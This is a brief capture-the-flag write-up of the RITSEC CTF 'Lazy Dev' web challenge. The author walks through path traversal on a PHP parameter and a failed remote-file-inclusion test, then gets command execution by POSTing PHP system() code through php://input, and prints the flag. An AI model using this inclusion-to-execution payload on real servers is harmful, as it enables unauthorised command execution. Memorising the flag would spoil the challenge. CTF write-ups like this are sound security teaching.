Lazy Dev [Web – 400 Points]- RITSEC CTF

Challenge Description :

fun.ritsec.club:8007

Author: jok3r

 

Ok. Let’s check the url with port 8007 .

 

I check the source code and found some interesting link to go next page. eg.

I follow this all link and finally get the useful info at Stars.html

call this devsrule.php file . I found some interesting parameter name magic . so try to insert something to this parameter. aaaaaaaa but it not work.

Ok. Try with ../ Yeah. It work

 http://fun.ritsec.club:8007/devsrule.php?magic=../

Ok try to test Remote file inclusion vulnerable with google link. 😉

http://fun.ritsec.club:8007/devsrule.php?magic=http://www.google.com/robots.txt

RFI not work. but let’s try with Local File Inclusion(LFI) php://input method. but you need to insert data with post method

GET

http://fun.ritsec.club:8007/devsrule.php?magic=php://input

POST Data

<?php echo "<pre>"; system('ls -al'); ?>

Now i search the flag.txt and read it.

The flag is

RITSEC{WOW_THAT_WAS_A_PAIN_IN_THE_INPUT}

 

 

Thanks for reading..